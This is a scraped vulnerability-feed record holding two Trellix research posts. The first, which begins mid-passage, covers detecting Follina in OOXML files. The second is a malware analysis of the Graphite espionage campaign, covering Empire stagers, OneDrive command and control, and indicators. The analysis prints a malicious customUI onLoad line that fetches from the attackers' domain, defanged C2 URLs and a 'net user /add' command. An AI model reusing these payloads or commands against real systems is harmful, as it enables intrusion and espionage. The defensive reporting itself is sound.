IT_BrowseForFile. This argument can take an embedded PowerShell script inside $( ), resulting in code execution. The PowerShell script is Base64 encoded; its decoded form is shown below. \n\n Figure 5: Decoded PowerShell script \n\n\nAs we see in the decoded payload, the script is intended to run the malicious rgb.exe on the target system. Summarizing the sequence involved in the attack:\n\n * A malicious MS Office document with a linked object is delivered to the victim, possibly as part of a phishing campaign.\n * On opening the document, the malicious HTML script is rendered, leading to arbitrary code execution on the affected system. \n\nWindows registers an innumerable number of URI protocol handlers which could potentially be abused to exploit similar flaws. 
For instance, the [search-ms](<https://docs.microsoft.com/en-us/windows/win32/search/getting-started-with-parameter-value-arguments>) URI protocol handler, used to query the Windows Search indexing feature, can be abused by attackers to connect to a remote SMB share on an attacker-controlled server. It does not directly lead to code execution, as it requires multiple levels of user interaction, but a query can be crafted to lure users into executing legitimate-looking executables, as shown below. Both of these URI protocol attacks were first [reported here](<https://benjamin-altpeter.de/shell-openexternal-dangers/>).\n\n Figure 6: search-ms query to connect to remote location \n\n\n**How Trellix NSP protects against Follina**\n\nTrellix NSP has been one of the most advanced and mature IPS products in the security industry. Over time, we have developed cutting-edge features to deal with complex attack scenarios involving encodings, compression, and complex file formats; **Microsoft Office Deep File Inspection** and **Multi Attack ID Correlation** are two of these. We use a combination of these advanced capabilities to detect the entire attack cycle. In the following sections, we will look at how the Trellix Network Security Platform\u2019s advanced inspection capabilities highlighted above can correlate multiple low or medium severity events to detect phases in the attack cycle, thereby raising the overall confidence level.\n\n**Microsoft Office Open XML (OOXML) file format**\n\nThe OLE file format traditionally used in Microsoft Office has been replaced by Office Open XML. Office Open XML (OOXML) is a zipped, XML-based file format developed by Microsoft for representing spreadsheets, charts, presentations, and word processing documents. In a nutshell, this means that the whole document is contained in a zip package. Multiple files and directories together form the document. 
There are entries like [Content_Types].xml, _rels and docProps, which are a basic part of all Office zip packages, and then there is a directory specific to the document type _(the word directory for docx, and the xl and ppt directories for xlsx and pptx respectively)_. For each document type, the specific directory contains files particular to that type. For example, in the case of a docx file, the \u2018word\u2019 directory contains the document.xml file, which holds the core content of the document. Here is a brief overview of the important files under these directories: \n\n**[Content_Types].xml** \nThis file contains the MIME type information for the parts of the package. It uses defaults for certain file extensions and overrides for parts specified by Internationalized Resource Identifier (IRI).\n\n**_rels** \nThis directory contains the relationship information for files within the package.\n\n**_rels/.rels** \nThis is the location where applications look first to find the package relationships.\n\n**docProps/core.xml** \nThis file contains the core properties for any Office Open XML document.\n\n**word/document.xml** \nThis file is the main part of any Word document.\n\nThe zip file format specification states that each file in a zip archive is stored in a file record structure. For each file in the archive, there is a corresponding entry of this structure. \n\n[local file header 1] \n[file data 1] \n[data descriptor 1] \n. \n. \n. \n[local file header n] \n[file data n] \n[data descriptor n] \n \n[archive decryption header] \n[archive extra data record] \n[central directory header 1] \n. \n. \n. \n[central directory header n] \n[zip64 end of central directory record] \n[zip64 end of central directory locator] \n[end of central directory record]\n\nThese structures are placed one after another. Each structure starts with a local file header, followed by optional extra data fields and the file data (optionally compressed and optionally encrypted). 
The local file header contains details about the file data and the encryption/compression mechanism, along with the file name, file size and a few other fields.\n\n**Local file header**\n\nOffset | Bytes | Description \n---|---|--- \n0 | 4 | Local file header signature # 0x04034b50 (read as a little-endian number) \n4 | 2 | Version needed to extract (minimum) \n6 | 2 | General purpose bit flag \n8 | 2 | Compression method \n10 | 2 | File last modification time \n12 | 2 | File last modification date \n14 | 4 | CRC-32 \n18 | 4 | Compressed size \n22 | 4 | Uncompressed size \n26 | 2 | File name length (n) \n28 | 2 | Extra field length (m) \n30 | n | File name \n30+n | m | Extra field \n\n\nFor Microsoft documents, deflate compression is commonly used. In a nutshell, the files which constitute the document are stored in a possibly encrypted and/or compressed form inside the zip package. In the figure below, we dissect this structure for the document.xml file under the word directory using a hex editor (010 Editor) with zip parsing capabilities, which helps us investigate the details \u2013\n\n Figure 7: Structure for document.xml \n\n\n**Need for deep file inspection**\n\nWe have seen in the past that different vulnerabilities may require IPS devices to examine the content of the different files present inside a zip package. The same is the case with Follina. As explained earlier, this vulnerability abuses the Microsoft OOXML **Object Linking and Embedding** functionality, linking a file to an external resource via the relationship file in order to load malicious content. Hence it requires the detection device to check the external references used in the word/_rels/document.xml.rels file. 
\n\n Figure 8: Structure of document.xml.rels \n\n\nSince this file is present as a compressed entity in the zip archive, meaningful detection with an IPS cannot be done until the file is decompressed. This is possible with NSP\u2019s industry-unique capability known as Deep File Inspection. \n\nThis is implemented using the protocol parsing capability of the NSP. The local file header structure for the specific file is parsed and the compressed data of the file is decoded. This feature can be used by enabling it from the inspection options policy.\n\n Figure 9: Policy configuration to enable MS Office Deep File Inspection \n\n\n_For more details, please refer to the NSP documentation_\n\n**Some of the key highlights: deep file inspection **\n\n * This feature decompresses the file contents inline; the complete file does not need to be downloaded for inspection \n * It also gives the flexibility to decompress only the content of a selected file (an individual file present inside the zip archive), yielding better performance since the whole zip archive does not need to be decompressed.\n * The individual files (which are part of the zip package) can be decompressed in a controlled manner by specifying a byte limit per file. This plays a great role in improving performance during inline inspection.\n\nTrellix NSP Attack ID **0x452a8400 - HTTP: OLE Object Linking Detected in OOXML File** \u2013 uses the Microsoft Office Deep File Inspection feature to detect signs of external object linking. However, just checking for external OLE references is not sufficient until it is ascertained that the external URI performs malicious activity. In this case, we know that the external URI loads HTML which invokes the MSDT handler in a malicious fashion. 
\n\nInvoking MSDT through HTML content is detected by Trellix NSP Attack ID **0x452ac200 \u2013 HTTP: Microsoft Support Diagnostic Tool Remote Code Execution Vulnerability (CVE-2022-30190)**.\n\n**Detecting the attack chain using multi attack ID Correlation**\n\nAttack visualization is better when the dots can be connected between the different stages of an attack. The Multi Attack ID Correlation capability helps achieve this by correlating multiple attacks. \n\nTrellix NSP Attack ID **0x43f02000 HTTP: Microsoft Support Diagnostic Tool RCE Vulnerability (CVE-2022-30190)** uses this capability and correlates \u201cHTTP: OLE Object Linking Detected in OOXML File (0x452a8400)\u201d and \u201cHTTP: Microsoft Support Diagnostic Tool Remote Code Execution Vulnerability (CVE-2022-30190) (0x452ac200)\u201d to generate a correlated attack event. \n\nThe alert generated using Multi AID correlation is of high confidence and severity and helps security admins take further action. This feature is built into Trellix NSP by default and no extra configuration is required to enable it. \n\n**Some of the key highlights: multi attack ID Correlation **\n\n * Two or more attacks can be correlated \n * Provides the capability to quarantine the attacker (configurable from the policy)\n * Correlation using attributes such as \u2013 \n * source IP/destination IP: this attribute helps correlate attacks originating from the same source IP and/or targeted at the same destination IP.\n * Lifetime: the maximum time interval in which all correlation signature events should occur\n * Threshold: detection of an attack happening repeatedly in a specific period.\n\nWith these strong correlation capabilities covering the complete attack cycle, Trellix Network Security Platform\u2019s threat detection solution balances effectiveness and performance extremely well. 
The Trellix NSP Research and Engineering team actively monitors emerging threat patterns and builds the features and capabilities needed to enhance the overall detection efficacy of the Intrusion Prevention System. \n\n## Conclusion \n\nWe have seen multiple vulnerabilities in the past using exploitation techniques similar in nature, and this is yet another addition to the series. In our previous blog, outlining the current state of memory corruption vulnerabilities and the challenges faced in exploiting them, we also highlighted the exploitation strategies of the future, and the **Follina** attack validates our prediction very well. While exploitation of different classes of memory corruption vulnerabilities can be eliminated by introducing mitigations at either the operating system or the hardware level, vulnerabilities exploiting design flaws will remain a challenge. Perimeter and endpoint security solutions will have to evolve to address those challenges by introducing innovative inspection and detection techniques, alongside applying secure software design and development practices during application development. 
\n", "cvss3": {}, "published": "2022-07-19T00:00:00", "type": "trellix", "title": "Countering Follina Attack (CVE- 2022-30190) with Trellix Network Security Platform\u2019s Advanced Detection Features", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40444", "CVE-2022-30190"], "modified": "2022-07-19T00:00:00", "id": "TRELLIX:D8DB23FAEBC16DCFBC54050BEBBF650D", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/countering-follina-attack-with-network-security-platforms-advanced-detection-features.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-01-25T00:00:00", "description": "# Prime Minister\u2019s Office Compromised: Details of Recent Espionage Campaign\n\nBy Marc Elias \u00b7 January 25, 2022\n\nA special thanks to Christiaan Beek, Alexandre Mundo, Leandro Velasco and Max Kersten for malware analysis and support during this investigation.\n\n#### Executive Summary\n\nOur Advanced Threat Research Team has identified a multi-stage espionage campaign targeting high-ranking government officials in Western Asia and Eastern Europe. As we detail the technical components of this attack, we can confirm that we have undertaken pre-release disclosure to the victims and provided all necessary content required to remove all known attack components from their environments. \n\nThe infection chain starts with the execution of an Excel downloader, most likely sent to the victim via email, which exploits an MSHTML remote code execution vulnerability ([CVE-2021-40444](<https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-defender-blog-mshtml-cve-2021-40444/>)) to execute a malicious executable in memory. The attack uses a follow-up piece of malware called Graphite because it uses Microsoft\u2019s Graph API to leverage OneDrive as a command and control server\u2014a technique our team has not seen before. Furthermore, the attack was split into multiple stages to stay as hidden as possible. 
\n\nCommand and control functions used an Empire server that was prepared in July 2021, and the actual campaign was active from October to November 2021. The blog below will explain the inner workings, victimology, infrastructure and timeline of the attack and, of course, reveal the IOCs and MITRE ATT&CK techniques.\n\nA number of the attack indicators and apparent geopolitical objectives resemble those associated with the previously uncovered threat actor APT28. While we don\u2019t believe in attributing any campaign solely based on such evidence, we have a moderate level of confidence that our assumption is accurate. That said, we are supremely confident that we are dealing with a very skilled actor based on how the infrastructure, malware coding and operation were set up.\n\nTrellix customers are protected by the different McAfee Enterprise and FireEye products that were provided with these indicators.\n\n#### Analysis of the Attack Process\n\nThis section provides an analysis of the overall process of the attack, beginning with the execution of an Excel file containing an exploit for the MSHTML remote code execution vulnerability ([CVE-2021-40444](<https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-defender-blog-mshtml-cve-2021-40444/>)). This is used to execute a malicious DLL file acting as a downloader for the third stage malware we called Graphite. Graphite is a newly discovered malware sample based on a OneDrive Empire Stager which leverages OneDrive accounts as a command and control server via the Microsoft Graph API. \n\nThe last phases of this multi-stage attack, which we believe is associated with an APT operation, include the execution of different Empire stagers to finally download an Empire agent onto victims\u2019 computers and engage the command and control server to remotely control the systems.\n\nThe following diagram shows the overall process of this attack.\n\n **Figure 1. 
Attack flow**\n\n### First Stage \u2013 Excel Downloaders\n\nAs suggested, the first stage of the attack likely uses a spear phishing email to lure victims into opening an Excel file, which goes by the name \u201cparliament_rew.xlsx\u201d. Below you can see the identifying information for this file:\n\nFile type | Excel Microsoft Office Open XML Format document \n---|--- \nFile name | parliament_rew.xlsx \nFile size | 19.26 KB \nCompilation time | 05/10/2021 \nMD5 | 8e2f8c95b1919651fcac7293cb704c1c \nSHA-256 | f007020c74daa0645b181b7b604181613b68d195bd585afd71c3cd5160fb8fc4 \n \n **Figure 2. Decoy text observed in the Excel file**\n\nIn analyzing this file\u2019s structure, we observed that it includes a folder named \u201ccustomUI\u201d that contains a file named \u201ccustomUI.xml\u201d. Opening this file with a text editor, we observed that the malicious document uses the \u201cCustomUI.OnLoad\u201d property of the OpenXML format to load an external file from a remote server: \n\n** <customUI xmlns**=\"http://schemas.microsoft.com/office/2006/01/customui\" onLoad='https://wordkeyvpload[.]net/keys/parliament_rew.xls!123'> </customUI>\n\nThis technique allows the attackers to bypass some antivirus scanning engines and office analysis tools, decreasing the chances of the documents being detected. \n\nThe downloaded file is again an Excel spreadsheet, but this time it is saved using the old Microsoft Office Excel 97-2003 Binary File Format (.xls). 
Below you can see the identifying information of the file:\n\nFile type | Microsoft Office Excel 97-2003 Binary File Format \n---|--- \nFile name | parliament_rew.xls \nFile size | 20.00 KB \nCompilation time | 05/10/2021 \nMD5 | abd182f7f7b36e9a1ea9ac210d1899df \nSHA-256 | 7bd11553409d635fe8ad72c5d1c56f77b6be55f1ace4f77f42f6bfb4408f4b3a \n \nAnalyzing the metadata objects, we can identify that the creator was using the codepage 1252 used in Western European countries and the file was created on October 5th, 2021.\n\n **Figure 3. Document metadata**\n\nLater, we analyzed the OLE objects in the document and discovered a Linked Object OLEStream Structure which contains a link to the exploit of the CVE-2021-40444 vulnerability hosted in the attackers\u2019 server. This allows the document to automatically download the HTML file and subsequently call the Internet Explorer engine to interpret it, triggering the execution of the exploit.\n\n **Figure 4. Remote link in OLE object**\n\nIn this blog post we won\u2019t examine the internals of the CVE-2021-40444 vulnerability as it has already been publicly explained and discussed. Instead, we will continue the analysis on the second stage DLL contained in the CAB file of the exploit.\n\n#### Second Stage \u2013 DLL Downloader\n\nThe second stage is a DLL executable named fontsubc.dll which was extracted from the CAB file used in the exploit mentioned before. You can see the identifying information of the file below:\n\nFile type | PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit \n---|--- \nFile name | fontsubc.dll \nFile size | 88.50 KB \nCompilation time | 28/09/2021 \nMD5 | 81de02d6e6fca8e16f2914ebd2176b78 \nSHA-256 | 1ee602e9b6e4e58dfff0fb8606a41336723169f8d6b4b1b433372bf6573baf40 \n \nThis file exports a function called \u201cCPlApplet\u201d that Windows recognizes as a control panel application. 
Primarily, this acts as a downloader for the next stage malware, which is located at hxxps://wordkeyvpload[.]net/keys/update[.]dat, using COM objects and the API \u201cURLOpenBlockingStreamW\u201d. \n\n **Figure 5. Download of next stage malware**\n\nAfter downloading the file, the malware will decrypt it with an embedded RSA public key and check its integrity by calculating a SHA-256 of the decrypted payload. Lastly, the malware will allocate virtual memory, copy the payload to it and execute it.\n\n **Figure 6. Payload decryption and execution**\n\nBefore executing the downloaded payload, the malware will compare the first four bytes with the magic value DE 47 AC 45 in hexadecimal; if they are different, it won\u2019t execute the payload.\n\n **Figure 7. Malware magic value**\n\n#### Third Stage \u2013 Graphite Malware\n\nThe third stage is a DLL executable, never written to disk, named dfsvc.dll that we were able to extract from the memory of the previous stage. Below you can see the identifying information of the file:\n\nFile type | PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit \n---|--- \nFile name | dfsvc.dll \nFile size | 24.00 KB \nCompilation time | 20/09/2021 \nMD5 | 0ff09c344fc672880fdb03d429c7bda4 \nSHA-256 | f229a8eb6f5285a1762677c38175c71dead77768f6f5a6ebc320679068293231 \n \nWe named this malware Graphite due to its use of the Microsoft Graph API to use OneDrive as command and control. It is very likely that the developers of Graphite used the Empire OneDrive Stager as a reference, given the similarities in functionality and in the file structure used in the actors\u2019 OneDrive account.\n\n **Figure 8. Empire OneDrive stager API requests**\n\nGraphite starts by creating a mutex with the hardcoded name \u201c250gHJAWUI289382s3h3Uasuh289di\u201d to avoid double execution, then decrypts its strings and dynamically resolves the APIs it will use later. 
Moreover, it will calculate a bot identifier to identify the infected computer which is a CRC32 checksum of the value stored in the registry key \u201cHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\ Cryptography\\MachineGuid\u201d.\n\n **Figure 9. Graphite initializations**\n\nNext, the malware will create a thread to monitor the execution of tasks and upload its results to the OneDrive account. Result files will be uploaded to the \u201cupdate\u201d folder of the attackers\u2019 OneDrive account. \n\n **Figure 10. Thread to monitor task results**\n\nAfter that, the malware will enter into an infinite loop where every 20 minutes it will obtain a new OAuth2 token to use with the Microsoft Graph API requests and determine if there are new tasks to execute in the \u201ccheck\u201d folder of the attackers\u2019 OneDrive account. \n\n **Figure 11. Request of new OAuth2 token**\n\nOnce it obtained a valid OAuth2 token, reconnaissance data is gathered containing the following information from the victims\u2019 systems:\n\n * Running processes\n * .NET CLR version from PowerShell\n * Windows OS version\n\nThe data is compressed using the LZNT1 algorithm and encrypted with a hardcoded AES-256-CBC key with a random IV. The operator tasks are encoded in the same way. Finally, the file containing the system information is uploaded to the folder \u201c{BOT_ID}/update\u201d in OneDrive with a random name.\n\n **Figure 12. Graphite encoding data**\n\nGraphite will also query for new commands by enumerating the child files in the \"check\" subdirectory. If a new file is found, it will use the Graph API to download the content of the file and decrypt it. The decrypted tasks have two fields; the first one is a unique identifier of the task and the second one specifies the command to execute.\n\nThe command value \u201c1\u201d will instruct the malware to send the system information to the command and control again, which is the attackers\u2019 OneDrive. 
The command value \u201c2\u201d indicates that the decrypted task is a shellcode, and the malware will create a thread to execute it.\n\n **Figure 13. Graphite commands**\n\nIf the received task is a shellcode, it will check the third field with the magic value DE 47 AC 45 in hexadecimal and, if they are different, it won\u2019t execute the payload. The rest of the bytes of the task is the shellcode that will be executed. Lastly, the task files are deleted from the OneDrive after being processed.\n\n **Figure 14. Decrypted operator task**\n\nThe diagram below summarizes the flow of the Graphite malware.\n\n **Figure 15. Graphite execution diagram**\n\n#### Fourth Stage \u2013 Empire DLL Launcher Stager\n\nThe fourth stage is a dynamic library file named csiresources.dll that we were able to extract from a task from the previous stage. The file was embedded into a Graphite shellcode task used to reflectively load the executable into the memory of the process and execute it. Below you can see the identifying information of the file:\n\nFile type | PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit \n---|--- \nFile name | csiresources.dll \nFile size | 111.00 KB \nCompilation time | 21/09/2021 \nMD5 | 138122869fb47e3c1a0dfe66d4736f9b \nSHA-256 | 25765faedcfee59ce3f5eb3540d70f99f124af4942f24f0666c1374b01b24bd9 \n \nThe sample is a generated Empire DLL Launcher stager that will initialize and start the .NET CLR Runtime into an unmanaged process to execute a download-cradle to stage an Empire agent. With that, it is possible to run the Empire agent in a process that\u2019s not PowerShell.exe.\n\nFirst, the malware will check if the malware is executing from the explorer.exe process. If it is not, the malware will exit.\n\n **Figure 16. Process name check**\n\nNext, the malware will try to find the file \u201cEhStorShell.dll\u201d in the System32 folder and load it. 
With this, the malware makes sure that the original \u201cEhStorShell.dll\u201d is loaded into the explorer.exe context.\n\n **Figure 17. Loading EhStorShell.dll library**\n\nThe previous operation matters because the follow-up malware overrides the CLSID \u201c{D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D}\u201d to gain persistence on the victim\u2019s system, a COM hijacking technique. That CLSID corresponds to the \u201cEnhanced Storage Shell Extension DLL\u201d and is normally handled by \u201cEhStorShell.dll\u201d. Because explorer.exe resolves the per-user CLSID registration before the machine-wide one, the hijacked entry is loaded every time the shell starts; loading the legitimate DLL as well keeps the shell extension working so that nothing visibly breaks.\n\nNext, the malware loads, initializes and starts the .NET CLR runtime, XOR-decrypts the next-stage .NET payload and loads it into memory. Lastly, it executes that payload with the .NET runtime.\n\n **Figure 18. Decryption of next stage malware**\n\n#### Fifth Stage \u2013 Empire PowerShell C# Stager\n\nThe fifth stage is a .NET executable named Service.exe, which was embedded and encrypted in the previous stage. Below you can see the identifying information of the file:\n\nFile type | PE32 executable for MS Windows (console) Intel 80386 32-bit \n---|--- \nFile size | 34.00 KB \nMD5 | 3b27fe7b346e3dabd08e618c9674e007 \nSHA-256 | d5c81423a856e68ad5edaf410c5dfed783a0ea4770dbc8fb4943406c316a4317 \n \nThis sample is an Empire PowerShell C# stager whose main goal is to create a PowerShell object instance, decrypt the embedded PowerShell script with XOR operations, Base64-decode it and finally execute the payload with the Invoke function.\n\n **Figure 19. Fifth stage code**\n\nThe point of hosting the PowerShell engine inside a .NET executable rather than powershell.exe is to run the script from a process that controls keyed on powershell.exe (application control rules, process-based detections) do not expect. Note that AMSI and script block logging are implemented inside the PowerShell engine itself (System.Management.Automation), so a custom host does not bypass them on its own; the stager would have to tamper with them separately.\n\n#### Sixth Stage \u2013 Empire HTTP PowerShell Stager\n\nThe last stage is a PowerShell script, specifically an Empire HTTP stager, which was embedded and encrypted in the previous stage. 
Below you can see the identifying information of the file:\n\nFile type | PowerShell script \n---|--- \nFile size | 6.00 KB \nMD5 | a81fab5cf0c2a1c66e50184c38283e0e \nSHA-256 | da5a03bd74a271e4c5ef75ccdd065afe9bd1af749dbcff36ec7ce58bf7a7db37 \n \nAs we mentioned earlier, this is the last stage of the multi-stage attack: an HTTP stager heavily obfuscated with Invoke-Obfuscation (bundled with Empire) to make analysis difficult.\n\n **Figure 20. Obfuscated PowerShell script**\n\nThe main functionality of the script is to contact hxxp://wordkeyvpload[.]org/index[.]jsp to send the initial information about the system, then connect to hxxp://wordkeyvpload[.]org/index[.]php to download the encrypted Empire agent, decrypt it with AES-256 and execute it. \n\n#### Timeline of Events\n\nBased on all the activities monitored and analyzed, we provide the following timeline of events:\n\n **Figure 21. Timeline of the campaign**\n\n#### Targeting\n\nOne of the lure documents we mentioned before (named \u201cparliament_rew.xlsx\u201d) may have been aimed at government employees.\n\nBesides targeting government entities, it appears this adversary also has its sights on the defense industry. Another document, named \u201cMissions Budget.xlsx\u201d, contained the text \u201cMilitary and civilian missions and operations\u201d and the budgets in dollars for the military operations in some countries for the years 2022 and 2023.\n\n **Figure 22. Lure document targeting the defense sector**\n\nMoreover, from our telemetry we also observed that Poland and other Eastern European countries were of interest to the actors behind this campaign.\n\nThe complete victimology of the actors is unknown, but the lure documents we have seen show that their activities are centered on specific regions and industries. 
Based on the file names, the content of the malicious Excel files and our telemetry, the targeted countries are in Western Asia and Eastern Europe, and the most prevalent industries are defense and government.\n\n#### Infrastructure\n\nThanks to the analysis of the full attack chain, two hosts related to the attack were identified. The first domain is wordkeyvpload.net, which resolves to the IP 131.153.96.114, located in Serbia; the domain was registered on the 7th of July 2021 with OwnRegistrar Inc. \n\nA reverse DNS lookup of the IP returned a PTR record pointing to the domain \u201cbwh7196.bitcoinwebhosting.net\u201d, which could indicate that the server was bought from the Bitcoin Web Hosting VPS reseller.\n\n **Figure 23. Reverse DNS query**\n\nThe main function of this command-and-control server is to host the HTML exploit for CVE-2021-40444 and the CAB file containing the second-stage DLL.\n\nThe second domain identified is wordkeyvpload.org, which resolves to the IP 185.117.88.19, located in Sweden; the domain was registered on the 18th of June 2021 with Namecheap Inc. Based on the operating system (Microsoft Windows Server 2008 R2), the HTTP server banner (Microsoft-IIS/7.5) and the open ports (1337 and 5000), it is very likely that the host is running a recent version of the Empire post-exploitation framework.\n\nThe reasoning behind that hypothesis is that the default configuration of Empire servers uses port 1337 for its RESTful API and port 5000 for a SocketIO interface used to interact remotely with the server. Also, when deploying an HTTP listener, the default value of the HTTP Server field is hardcoded to \u201cMicrosoft-IIS/7.5\u201d, so the IIS banner is a spoofed header rather than evidence of a real IIS installation.\n\n **Figure 24. 
Local Empire server execution with default configuration**\n\nWith the aforementioned information, as well as the extraction of the command and control from the last stage of the malware, we can confirm that this host acts as an Empire server used to remotely control the agents installed on victims\u2019 machines and send them commands to execute.\n\n#### Attribution\n\nDuring the timeline of this operation there were political tensions around the Armenian and Azerbaijani border. From a classic intelligence-operation point of view, it would therefore make complete sense to infiltrate and gather information to assess the risk and movements of the different parties involved. \n\nThroughout our research into the Graphite campaign, we extracted all timestamps of attacker activity from our telemetry and found two consistent trends. First, the adversary is active from Monday to Friday, as depicted in the image below:\n\n **Figure 25. Adversary\u2019s working days**\n\nSecond, the activity timestamps correspond to normal business hours (from 08h to 18h) in the GMT+3 time zone, which includes Moscow Time, Turkey Time, Arabia Standard Time and East Africa Time. Working-hour patterns are a supporting indicator only: several regions share the offset and an operator can shift or schedule activity.\n\n **Figure 26. Adversary\u2019s working hours**\n\nAnother interesting discovery during the investigation was that the attackers used the CLSID (D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D) for persistence, which matched an ESET report in which researchers described a Russian operation targeting Eastern European countries.\n\nAnalyzing and comparing code blocks and sequences from the Graphite malware against our database of samples, we discovered overlap with samples from 2018 that were attributed to APT28. 
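The working-day and working-hour analysis behind Figures 25 and 26, as an added Python example (not Trellix's analysis code). It generalises the page's single observation: rather than checking GMT+3 only, it scores every whole-hour UTC offset against a Monday-to-Friday, 08h-to-18h window and reports the best fit; the timestamps are constructed.

```python
"""Infer an operator's working time zone from activity timestamps.

Added example, not Trellix's analysis code. For every whole-hour UTC offset
it measures how many events fall inside a weekday business-hours window and
reports the best-fitting offset. Timestamps below are constructed; the
window is the one the text uses.
"""
from datetime import datetime, timedelta, timezone

WORK_START, WORK_END = 8, 18               # [08:00, 18:00) local time


def parse_utc(stamps):
    """Parse ISO-8601 UTC timestamps such as 2021-10-04T05:10:00Z."""
    return [datetime.fromisoformat(s.replace("Z", "+00:00")) for s in stamps]


def fraction_in_business_hours(events, offset_hours):
    """Share of events on Mon-Fri between WORK_START and WORK_END at this offset."""
    tz = timezone(timedelta(hours=offset_hours))
    hits = 0
    for ts in events:
        local = ts.astimezone(tz)
        if local.weekday() < 5 and WORK_START <= local.hour < WORK_END:
            hits += 1
    return hits / len(events)


def activity_profile(events, offset_hours):
    """Counts per weekday (0 = Monday) and per hour: the data behind Figures 25 and 26."""
    tz = timezone(timedelta(hours=offset_hours))
    days, hours = [0] * 7, [0] * 24
    for ts in events:
        local = ts.astimezone(tz)
        days[local.weekday()] += 1
        hours[local.hour] += 1
    return days, hours


def best_offset(events, candidates=range(-12, 15)):
    """(offset, fraction) for the whole-hour UTC offset that best explains the activity.

    Ties go to the offset closest to UTC. Several zones share one offset
    (GMT+3 covers Moscow, Turkey, Arabia Standard and East Africa time), so
    the result narrows a region and is not an attribution on its own.
    """
    best = max(candidates, key=lambda off: (fraction_in_business_hours(events, off), -abs(off)))
    return best, fraction_in_business_hours(events, best)


# constructed sample, all UTC: Monday 4 to Friday 8 October 2021
SAMPLE_ACTIVITY = parse_utc([
    "2021-10-04T05:10:00Z",   # 08:10 at UTC+3, but before 08:00 at UTC+2
    "2021-10-04T09:45:00Z",
    "2021-10-05T06:30:00Z",
    "2021-10-05T14:50:00Z",   # 17:50 at UTC+3, but past 18:00 at UTC+4
    "2021-10-06T11:05:00Z",
    "2021-10-07T07:20:00Z",
    "2021-10-08T13:15:00Z",
])
```

With real telemetry, feed `best_offset` the full set of first-seen times and use `activity_profile` at the winning offset to draw the two histograms; the edge events (earliest and latest of the day) are what separate neighbouring offsets, so a handful of outliers can move the answer by an hour.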
We compared our samples, for example, against this one: 5bb9f53636efafdd30023d44be1be55bf7c7b7d5 (SHA-1):\n\n **Figure 27 Code comparison of samples**\n\nWhen we zoom in on some of the functions, we observe the Graphite sample on the left side of the picture below and the aforementioned 2018 sample on the right. With almost three years between the samples, it makes sense that the code has changed, but it still looks like the programmer was happy with some of the previous functions:\n\n **Figure 28 Similar function flow**\n\nAlthough we have described some tactics, techniques and procedures (TTPs) of the actors behind this campaign, the context, similarities and overlap we have only point us with low to moderate confidence towards APT28, and not at all towards a specific nation-state sponsor. However, we believe we are dealing with a skilled actor, based on how the infrastructure, malware coding and operation were set up. \n\n#### Conclusion\n\nThe analysis of the campaign described in this blog post allowed us to gather insights into a multi-staged attack performed in early October, leveraging the MSHTML remote code execution vulnerability (CVE-2021-40444) to target countries in Eastern Europe. \n\nAs seen in the analysis of the Graphite malware, one quite innovative functionality is the use of the OneDrive service as command and control by querying the Microsoft Graph API with a token hardcoded in the malware. This type of communication allows the malware to go unnoticed on the victims\u2019 systems, since it only connects to legitimate Microsoft domains and its traffic does not stand out at the network level.\n\nThanks to the analysis of the full attack process, we were able to identify new infrastructure acting as the actors\u2019 command and control, and the final payload, which is an agent from the post-exploitation framework Empire. 
All the above allowed us to construct a timeline of the activity observed in the campaign.\n\nThe actors behind the attack seem very advanced based on the targeting, the malware and the infrastructure used in the operation, so we presume that the main goal of this campaign is espionage. With low to moderate confidence, we believe this operation was executed by APT28. To support further investigation, we provide the tactics, techniques and procedures (TTPs), infrastructure indicators, targeting and capabilities needed to detect this campaign.\n\n#### MITRE ATT&CK Techniques\n\nTactic | Technique ID | Technique Title | Observable | IOCs \n---|---|---|---|--- \nResource Development | T1583.001 | Acquire Infrastructure: Domains | Attackers purchased domains to be used as command and control. | wordkeyvpload[.]net, wordkeyvpload[.]org \nResource Development | T1587.001 | Develop Capabilities: Malware | Attackers built malicious components to conduct their attack. | Graphite malware \nResource Development | T1588.002 | Obtain Capabilities: Tool | Attackers employed red teaming tools to conduct their attack. | Empire \nInitial Access | T1566.001 | Phishing: Spearphishing Attachment | Adversaries sent spear phishing emails with a malicious attachment to gain access to victim systems. | BM-D(2021)0247.xlsx \nExecution | T1203 | Exploitation for Client Execution | Adversaries exploited a vulnerability in Microsoft Office to execute code. | CVE-2021-40444 \nExecution | T1059.001 | Command and Scripting Interpreter: PowerShell | Adversaries abused PowerShell for execution of the Empire stager. | Empire PowerShell stager \nPersistence | T1546.015 | Event Triggered Execution: Component Object Model Hijacking | Adversaries established persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. 
| CLSID: D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D \nPersistence | T1136.001 | Create Account: Local Account | Adversaries created a local account to maintain access to victim systems. | net user /add user1 \nDefense Evasion | T1620 | Reflective Code Loading | Adversaries reflectively loaded code into a process to conceal the execution of malicious payloads. | Empire DLL Launcher stager \nCommand and Control | T1104 | Multi-Stage Channels | Adversaries created multiple stages to obfuscate the command-and-control channel and to make detection more difficult. | Use of different Empire stagers \nCommand and Control | T1102.002 | Web Service: Bidirectional Communication | Adversaries used an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. | Microsoft OneDrive, Empire server \nCommand and Control | T1573.001 | Encrypted Channel: Symmetric Cryptography | Adversaries employed a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. | AES-256 \nCommand and Control | T1573.002 | Encrypted Channel: Asymmetric Cryptography | Adversaries employed a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. 
